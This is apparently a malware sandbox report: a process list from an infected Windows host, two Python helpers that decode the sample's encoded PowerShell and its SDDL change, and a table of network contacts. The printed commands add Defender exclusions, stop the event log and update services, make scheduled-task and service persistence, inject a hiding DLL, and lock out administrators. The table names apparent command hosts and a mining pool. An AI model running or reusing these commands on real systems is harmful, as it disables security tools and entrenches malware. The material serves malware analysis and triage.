\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
"C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe
"xfAk7rC2FeEN35Y8o.exe"
C:\Windows\system32\attrib.exe
attrib +H "xfAk7rC2FeEN35Y8o.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 728
C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
"C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe"
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2528 -ip 2528
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2528 -ip 2528
C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe
"C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_8.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_9.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p4632370330209207692137030328 -oextracted
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 644
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 2420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1084 -ip 1084
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
"C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2528 -ip 2528
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 892
C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe
"C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 972
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "FLWCUERA"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "FLWCUERA"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1068
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6900" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1164
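The process list above shows the sample adding Microsoft Defender exclusions twice: once as a plain `Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) ...` call, and once hidden behind `powershell -EncodedCommand` with `<# ... #>` block comments interleaved as junk padding. The helper below is an added example and not part of the sandbox report; it decodes such payloads (base64 over UTF-16LE, not UTF-8), strips the comment padding and pulls out the exclusion paths, so an analyst can see at a glance what the encoded command actually does. The three command lines it runs over are copied from the list above (plus one benign-looking launcher); the switch-prefix matching and the regexes are this example's own assumptions.

```python
"""Added triage helper: decode PowerShell -EncodedCommand payloads found in
sandbox process command lines and flag Defender exclusion tampering."""
import base64
import re

# The base64 blob from the "powershell -EncodedCommand" entry in the process list above.
ENCODED_PAYLOAD = "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA="

# Constructed sample: command lines copied from the process list above, plus one
# benign-looking launcher, so the helper runs offline.
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe Add-MpPreference "
    "-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    '"cmd.exe" /C powershell -EncodedCommand "' + ENCODED_PAYLOAD + '" & powercfg /hibernate off',
    "powershell -nologo -noprofile",
]

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
EXCLUSION_PATH = re.compile(r"-ExclusionPath\s+(@\([^)]*\)|\S+)", re.IGNORECASE)


def _is_encoded_switch(token):
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...) and -ec.
    name = token.lstrip("-/").lower()
    return name == "ec" or (bool(name) and "encodedcommand".startswith(name))


def extract_encoded_payload(cmdline):
    """Return the base64 argument that follows an -EncodedCommand style switch, or None."""
    tokens = [t.strip("\"'") for t in cmdline.split()]
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith(("-", "/")) and _is_encoded_switch(tok):
            return tokens[i + 1]
    return None


def decode_encoded_command(payload):
    """-EncodedCommand carries base64 over UTF-16LE; decoding as UTF-8 yields NUL-riddled junk."""
    return base64.b64decode(payload).decode("utf-16-le")


def strip_block_comments(script):
    """Drop <# ... #> block comments used as padding and collapse whitespace."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def find_defender_exclusions(script):
    """Return every -ExclusionPath argument of an Add-MpPreference call, else []."""
    if "add-mppreference" not in script.lower():
        return []
    return [m.group(1) for m in EXCLUSION_PATH.finditer(script)]


def triage_command_line(cmdline):
    """Decode if needed, clean up, and report Defender exclusion tampering for one command line."""
    payload = extract_encoded_payload(cmdline)
    script = decode_encoded_command(payload) if payload else cmdline
    clean = strip_block_comments(script)
    return {
        "encoded": payload is not None,
        "script": clean,
        "defender_exclusions": find_defender_exclusions(clean),
    }


def triage_all(cmdlines):
    return [triage_command_line(c) for c in cmdlines]


if __name__ == "__main__":
    for result in triage_all(SAMPLE_COMMAND_LINES):
        print(result)
```

For the encoded entry the cleaned script comes out as `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`; excluding `$env:SystemDrive` takes real-time scanning off the whole system volume, which is why the plain and the encoded variants are worth treating as the same finding. `Add-MpPreference` needs an elevated token, so a hit on an unprivileged process is a failed attempt rather than an applied exclusion.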
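The `sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)...` entry in the process list rewrites the security descriptor of a service named WinDefender (the list launches `C:\Windows\windefender.exe` next to it, a look-alike name rather than Microsoft's Defender engine). Raw SDDL is hard to read in a report, so the following Python, an added example and not part of the sandbox output, parses that exact string and names each access-control entry. The interesting entry is `(D;;WPDT;;;BA)`: it denies BUILTIN\Administrators SERVICE_STOP and SERVICE_PAUSE_CONTINUE, so `sc stop` or `net stop` fails even from an elevated shell, while the preceding allow entry still grants WRITE_DAC and DELETE, which means the right response is to reset the descriptor with another `sc sdset` or delete the service instead of trying to stop it. The code tables are the standard SDDL abbreviations as the Service Control Manager interprets them; the helper functions are this example's own.

```python
"""Added example: decode the service SDDL applied by `sc sdset WinDefender ...`
and explain what each ACE grants or denies to which trustee."""
import re

# Copied verbatim from the sc.exe sdset argument in the process list above.
WINDEFENDER_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

# Two-letter SDDL access codes with their service-object meaning.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
ACE_TYPES = {"A": "ALLOW", "D": "DENY", "AU": "AUDIT"}
ACE_FLAGS = {"SA": "SUCCESSFUL_ACCESS", "FA": "FAILED_ACCESS", "CI": "CONTAINER_INHERIT",
             "OI": "OBJECT_INHERIT", "NP": "NO_PROPAGATE", "IO": "INHERIT_ONLY", "ID": "INHERITED"}
TRUSTEES = {"SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
            "IU": "NT AUTHORITY\\INTERACTIVE", "SU": "NT AUTHORITY\\SERVICE",
            "WD": "Everyone", "AU": "NT AUTHORITY\\Authenticated Users", "BU": "BUILTIN\\Users"}


def _pairs(s):
    """Split a run of two-letter SDDL codes ('CCLCSW') into ['CC', 'LC', 'SW']."""
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def parse_ace(body):
    """'A;;CCLC;;;BA' -> dict. Field order: type;flags;rights;object_guid;inherit_guid;trustee."""
    ace_type, flags, rights, _obj, _inherit, trustee = (body.split(";") + [""] * 6)[:6]
    return {"type": ace_type, "flags": _pairs(flags),
            "rights": [rights] if rights.startswith("0x") else _pairs(rights),
            "trustee": trustee}


def parse_sddl(sddl):
    """Split the D: (DACL) and S: (SACL) sections into lists of ACE dicts."""
    acls = {"dacl": [], "sacl": []}
    for key, name in (("D", "dacl"), ("S", "sacl")):
        m = re.search(rf"\b{key}:((?:\([^)]*\))*)", sddl)
        if m:
            acls[name] = [parse_ace(a) for a in re.findall(r"\(([^)]*)\)", m.group(1))]
    return acls


def rights_for(acls, trustee, ace_type):
    """Rights named in DACL entries of one type ('A' allow or 'D' deny) for one trustee alias."""
    names = []
    for ace in acls["dacl"]:
        if ace["trustee"] == trustee and ace["type"] == ace_type:
            names.extend(SERVICE_RIGHTS.get(r, r) for r in ace["rights"])
    return names


def effective_rights(acls, trustee):
    """Allowed minus denied for a single trustee alias.

    This ignores group membership and ACE ordering. It is exact for this
    descriptor because the allow entry for BA never grants WP or DT, so the
    deny entry wins whether it is evaluated before or after the allow."""
    return sorted(set(rights_for(acls, trustee, "A")) - set(rights_for(acls, trustee, "D")))


def describe(acls):
    """One readable line per ACE."""
    lines = []
    for section in ("dacl", "sacl"):
        for ace in acls[section]:
            who = TRUSTEES.get(ace["trustee"], ace["trustee"])
            what = ", ".join(SERVICE_RIGHTS.get(r, r) for r in ace["rights"])
            flags = "".join(f"[{ACE_FLAGS.get(f, f)}]" for f in ace["flags"])
            lines.append(f"{section.upper()} {ACE_TYPES.get(ace['type'], ace['type'])}{flags} {who}: {what}")
    return lines


if __name__ == "__main__":
    acls = parse_sddl(WINDEFENDER_SDDL)
    print("\n".join(describe(acls)))
    print("Administrators effectively hold:", effective_rights(acls, "BA"))
```

The audit entry `(AU;FA;...;WD)` only logs failed access attempts by Everyone; it grants nothing. SYSTEM keeps WP, so the service can still be stopped from a SYSTEM context (for example a scheduled task or PsExec -s) even where an administrator is denied.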
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| FI | 109.107.182.3:80 | 109.107.182.3 | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.182.107.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 20.113.35.45:38357 | tcp | |
| DE | 141.95.211.148:46011 | tcp | |
| US | 8.8.8.8:53 | 148.211.95.141.in-addr.arpa | udp |
| RU | 5.42.65.31:48396 | tcp | |
| DE | 185.172.128.19:80 | tcp | |
| HK | 154.92.15.189:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 172.67.206.188:443 | racerecessionrestrai.site | tcp |
| NL | 94.156.67.176:13781 | tcp | |
| DE | 185.172.128.79:80 | 185.172.128.79 | tcp |
| HK | 154.92.15.189:80 | app.alie3ksgaa.com | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.213.67.172.in-addr.arpa | udp |
| US | 20.242.39.171:443 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| DE | 144.76.1.85:25894 | tcp | |
| US | 172.67.177.31:443 | tcp | |
| US | 8.8.8.8:53 | 31.177.67.172.in-addr.arpa | udp |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server10.thestatsfiles.ru | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.96:443 | server10.thestatsfiles.ru | tcp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| GB | 142.251.29.127:19302 | stun.l.google.com | udp |
| US | 104.21.23.184:443 | walkinglate.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.29.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| BG | 185.82.216.96:443 | server10.thestatsfiles.ru | tcp |
| US | 8.8.8.8:53 | joxi.net | udp |
| US | 172.67.162.70:80 | joxi.net | tcp |
| US | 172.67.162.70:443 | joxi.net | tcp |
| US | 8.8.8.8:53 | 70.162.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.49.150.241:443 | tcp | |
| US | 8.8.8.8:53 | qualifiedbehaviorrykej.site | udp |
| US | 104.21.35.143:443 | qualifiedbehaviorrykej.site | tcp |
| US | 8.8.8.8:53 | 143.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | combinethemepiggerygoj.site | udp |
| US | 172.67.137.14:443 | combinethemepiggerygoj.site | tcp |
| US | 8.8.8.8:53 | 14.137.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | weedpairfolkloredheryw.site | udp |
| US | 104.21.40.14:443 | weedpairfolkloredheryw.site | tcp |
| US | 8.8.8.8:53 | 14.40.21.104.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| DE | 185.221.198.109:80 | 185.221.198.109 | tcp |
| NL | 195.20.16.153:80 | 195.20.16.153 | tcp |
| DE | 185.221.198.109:80 | 185.221.198.109 | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.198.221.185.in-addr.arpa | udp |
